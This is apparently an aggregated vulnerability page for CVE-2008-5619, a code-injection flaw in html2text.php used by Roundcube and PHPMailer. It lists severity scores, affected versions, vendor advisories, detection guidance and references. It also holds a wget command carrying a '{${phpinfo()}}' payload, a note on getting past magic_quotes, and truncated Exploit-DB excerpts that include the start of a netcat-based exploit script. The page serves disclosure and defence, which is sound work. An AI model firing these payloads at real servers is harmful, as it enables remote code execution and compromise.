CVE-2008-5619
Published 2008-12-17
CVE-2008-5619: html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara…
Priority: P2 · 70 · critical · 10 · CVSS 2.0
Vector: AV:N/AC:L/Au:N/C:C/I:C/A:C
EXPLOIT
EPSS: 54.00% (98.9th percentile)
html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5.2.10, RoundCube Webmail (roundcubemail) 0.2-1.alpha and 0.2-3.beta, Mahara, and AtMail Open 1.03, allows remote attackers to execute arbitrary code via crafted input that is processed by the preg_replace function with the eval switch.
Affected
4 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| debian | roundcube | < roundcube 0.1.1-9 (bookworm) | roundcube 0.1.1-9 (bookworm) |
| phpmailer | phpmailer | >= 0 < 5.2.10 | 5.2.10 |
| roundcube | webmail | — | — |
| roundcube | webmail | — | — |
Detection & IOCs
Command: wget -q --header="Content-Type: ''" -O - --post-data='{${phpinfo()}}' --no-check-certificate http://127.0.0.1/roundcubemail-0.2-alpha/bin/html2text.php
- Monitor POST requests to bin/html2text.php or program/lib/html2text.php containing PHP curly/complex syntax payloads such as '{${...}}' in the POST body or HTTP headers (e.g., Accept header).
- Detect exploitation attempts where the HTTP Accept header contains Base64-encoded PHP code, as the exploit delivers its payload via BASE64_DECODE($_SERVER[HTTP_ACCEPT]).
- Alert on POST requests to html2text.php with body content matching the pattern '{${...}}' which triggers PHP code execution via preg_replace with the 'e' (eval) flag.
- The exploit targets html2text.php only when it is directly accessible via HTTP POST; if the file is not web-accessible (e.g., restricted to CLI use only), the remote attack vector is eliminated.
- PHP's disable_functions setting can limit post-exploitation impact (e.g., exec, system disabled), but does not prevent initial code execution via preg_replace eval.
- PHP magic_quotes_gpc may complicate exploitation but can be bypassed using PHP curly syntax tricks to avoid single or double quotes.
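CVSS provenance
| Source | Version | Score | Severity | Vector |
|---|---|---|---|---|
| nvd | v2.0 | 10.0 | CRITICAL | AV:N/AC:L/Au:N/C:C/I:C/A:C |
| osv | | 10.0 | CRITICAL | |
| vendor_debian | | 10.0 | HIGH | |
| vendor_redhat | | 10.0 | CRITICAL | |
| vendor_ubuntu | | 6.8 | MEDIUM | |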
Ubuntu
Moodle vulnerabilities
vendor_ubuntu·2009-06-24·CVSS 6.8
CVE-2009-0500 [MEDIUM] Moodle vulnerabilities
Thor Larholm discovered that PHPMailer, as used by Moodle, did not
correctly escape email addresses. A local attacker with direct access
to the Moodle database could exploit this to execute arbitrary commands
as the web server user. (CVE-2007-3215)
Nigel McNie discovered that fetching https URLs did not correctly escape
shell meta-characters. An authenticated remote attacker could execute
arbitrary commands as the web server user, if curl was installed and
configured. (CVE-2008-4796, MSA-09-0003)
It was discovered that Smarty (also included in Moodle), did not
correctly filter certain inputs. An authenticated remote attacker could
exploit this to execute arbitrary PHP commands as the web server user.
(CVE-2008-4810, CVE-2008
Red Hat
roundcubemail: Remotely exploitable code injection vulnerability
vendor_redhat·2008-12-09·CVSS 10.0
CVE-2008-5619 [CRITICAL] roundcubemail: Remotely exploitable code injection vulnerability
Debian
CVE-2008-5619: roundcube - html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5...
vendor_debian·2008·CVSS 10.0
CVE-2008-5619 [CRITICAL] CVE-2008-5619: roundcube - html2text.php in Chuggnutt HTML to Text Converter, as used in PHPMailer before 5...
Scope: local
bookworm: resolved (fixed in 0.1.1-9)
bullseye: resolved (fixed in 0.1.1-9)
forky: resolved (fixed in 0.1.1-9)
sid: resolved (fixed in 0.1.1-9)
trixie: resolved (fixed in 0.1.1-9)
OSV
PHPMailer susceptible to arbitrary code execution
osv·2022-05-14
CVE-2008-5619 [HIGH] PHPMailer susceptible to arbitrary code execution
GHSA
PHPMailer susceptible to arbitrary code execution
ghsa·2022-05-14
CVE-2008-5619 [HIGH] CWE-94 PHPMailer susceptible to arbitrary code execution
OSV
CVE-2008-5619: html2text
osv·2008-12-17·CVSS 10.0
CVE-2008-5619 [CRITICAL] CVE-2008-5619: html2text
No detection rules found.
Exploit-DB
Roundcube Webmail 0.2b - Remote Code Execution
exploitdb·2008-12-22·CVSS 10.0
CVE-2008-5619 [CRITICAL] Roundcube Webmail 0.2b - Remote Code Execution
---
#!/bin/sh
#
# I was hoping the PoC would not appear so soon,
# but now that it is out,
# i thought i might as well publish my real exploit.
#
# Hunger
#
#
# http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5619
#
# FOR LEARNING PURPOSES ONLY!
#
# PHP> echo(ini_get('disable_functions'));
#
# exec, system
#
# PHP> passthru("id; uname -a");
#
# uid=666(www-data) gid=666(www-data) groups=666(www-data)
# Linux mail 2.6.28 #0 Sun Jan 01 10:05:33 CET 2009 i686 GNU/Linux
#
echo 'Exploit for Roundcube Webmail =\r\n\n'
if [ "$2" = "" ]; then echo "
Usage:
$0
Example:
\$ $0 localhost /roundcube/bin/html2text.php
For https sites use stunnel or socat!
"; exit 1; fi
NETCATEXE=`which nc`
BASE64ENC=`which base64`
if [ "$NETCATEXE" = "" ] ||
Exploit-DB
Roundcube Webmail 0.2-3 Beta - Code Execution
exploitdb·2008-12-22·CVSS 10.0
CVE-2008-5619 [CRITICAL] Roundcube Webmail 0.2-3 Beta - Code Execution
---
Public Release Date of POC: 2008-12-22
Author: Jacobo Avariento Gimeno (Sofistic)
CVE id: CVE-2008-5619
Bugtraq id: 32799
Severity: Critical
Vulnerability reported by: RealMurphy
Intro
----
Roundcube Webmail is a browser-based IMAP client that uses
"chuggnutt.com HTML to Plain Text Conversion" library to convert
HTML text to plain text, this library uses the preg_replace PHP
function in an insecure manner.
Vulnerable versions:
Round Cube RoundCube Webmail 0.2-3 beta
Round Cube RoundCube Webmail 0.2-1 alpha (tested)
Analysis of the vulnerable code
----
The script bin/html2text.php creates an instance of the class html2text
with the given POST data, the problem arises in the file
program/lib/html2text.php in function _convert() on line
References
- http://mahara.org/interaction/forum/topic.php?id=533
- http://osvdb.org/53893
- http://secunia.com/advisories/33145
- http://secunia.com/advisories/33170
- http://secunia.com/advisories/34789
- http://sourceforge.net/forum/forum.php?forum_id=898542
- http://trac.roundcube.net/changeset/2148
- http://trac.roundcube.net/ticket/1485618
- http://www.openwall.com/lists/oss-security/2008/12/12/1
- http://www.securityfocus.com/archive/1/499489/100/0/threaded
- http://www.vupen.com/english/advisories/2008/3418
- http://www.vupen.com/english/advisories/2008/3419
- https://github.com/PHPMailer/PHPMailer/commit/8beacc646acb67c995aea10ac5585970efc7355a
- https://www.exploit-db.com/exploits/7549
- https://www.exploit-db.com/exploits/7553
- https://www.redhat.com/archives/fedora-package-announce/2008-December/msg00783.html
- https://www.redhat.com/archives/fedora-package-announce/2008-December/msg00802.html